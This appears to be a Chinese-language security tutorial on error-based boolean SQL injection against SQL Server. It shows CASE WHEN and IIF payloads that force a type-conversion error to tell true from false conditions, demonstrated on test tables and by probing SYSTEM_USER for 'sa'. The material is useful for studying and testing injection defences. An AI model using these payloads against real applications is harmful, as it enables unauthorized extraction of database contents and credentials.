0x01 前言

在注入的时候,你可能会遇到一种情况,那就是某个地方有注入

但是表里没有数据,导致你无法正常的进行布尔注入

那么所以此方法你就可以获得跟 mysql语句 case when 1 like 1 then 0 else 2*1e308 end 类似的效果

这里使用的方法是 两者数据类型不一致然后又进行比对时,导致发生错误,这样来强制显示出布尔的效果

0x02 测试数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title | content |
  5. +----+-----------+-----------+
  6. | 1 | 测试标题 | 测试内容 |
  7. | 2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  2. sql server> select * from users;
  3. +----+--------------+----------+
  4. | id | username | password |
  5. +----+--------------+----------+
  6. | 1 | test-user-01 | 123456 |
  7. | 2 | test-user-02 | 234567 |
  8. +----+--------------+----------+
  9. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | sa |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | test |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x03 CASE 条件语句 例子一

SQL:select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE ‘x’ END)

  1. # 对的情况
  2. 1> select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE 'x' END);
  3. 2> go
  4. +----+----------+----------+
  5. | id | title | content |
  6. +----+----------+----------+
  7. | 1 | 测试标题 | 测试内容 |
  8. +----+----------+----------+
  9. (1 rows affected)

SQL:select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE ‘x’ END);

  1. # 错误的情况
  2. 1> select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE 'x' END);
  3. 2> go
  4. 22018 - [SQL Server]在将 varchar 'x' 转换成数据类型 int 时失败。

这样就可以达到强制布尔的结果了

0x04 CASE 条件语句 例子二

SQL:select * from article WHERE id=1 and 1=(CASE WHEN system_user like ‘%sa%’ THEN 1 ELSE ‘x’ END)

  1. # 查询SYSTEM_USER 正确的情况
  2. 1> SELECT
  3. *
  4. FROM
  5. article
  6. WHERE
  7. id = 1
  8. AND 1 = (
  9. CASE
  10. WHEN SYSTEM_USER LIKE '%sa%' THEN
  11. 1
  12. ELSE
  13. 'x'
  14. END
  15. );
  16. 2> go
  17. +----+----------+----------+
  18. | id | title | content |
  19. +----+----------+----------+
  20. | 1 | 测试标题 | 测试内容 |
  21. +----+----------+----------+
  22. (1 rows affected)

SQL:select * from article WHERE id=1 and 1=(CASE WHEN system_user like ‘%aaaaa%’ THEN 1 ELSE ‘x’ END)

  1. # 查询SYSTEM_USER 错误的情况
  2. 1> SELECT
  3. *
  4. FROM
  5. article
  6. WHERE
  7. id = 1
  8. AND 1 = (
  9. CASE
  10. WHEN SYSTEM_USER LIKE '%aaaaa%' THEN
  11. 1
  12. ELSE
  13. 'x'
  14. END
  15. );
  16. 2> go
  17. 22018 - [SQL Server]在将 varchar 'x' 转换成数据类型 int 时失败。

0x05 IIF 条件语句 例子一

SQL:select * from article WHERE id=1 and 1=IIF(1=1,1,’x’);

  1. # 对的情况
  2. 1> select * from article WHERE id=1 and 1=IIF(1=1,1,'x');
  3. 2> go
  4. +----+----------+----------+
  5. | id | title | content |
  6. +----+----------+----------+
  7. | 1 | 测试标题 | 测试内容 |
  8. +----+----------+----------+
  9. (1 rows affected)

SQL:select * from article WHERE id=1 and 1=IIF(1=2,1,’x’);

  1. # 错误的情况
  2. 1> select * from article WHERE id=1 and 1=IIF(1=2,1,'x');
  3. 2> go
  4. 22018 - [SQL Server]在将 varchar 'x' 转换成数据类型 int 时失败。

0x06 IIF 条件语句 例子二

  1. # 查询SYSTEM_USER 正确的情况
  2. 1> select * from article WHERE id=1 and 1=IIF(SYSTEM_USER LIKE '%sa%',1,'x');
  3. 2> go
  4. +----+----------+----------+
  5. | id | title | content |
  6. +----+----------+----------+
  7. | 1 | 测试标题 | 测试内容 |
  8. +----+----------+----------+
  9. (1 rows affected)
  1. # 查询SYSTEM_USER 错误的情况
  2. 1> select * from article WHERE id=1 and 1=IIF(SYSTEM_USER LIKE '%aaaa%',1,'x');
  3. 2> go
  4. 22018 - [SQL Server]在将 varchar 'x' 转换成数据类型 int 时失败。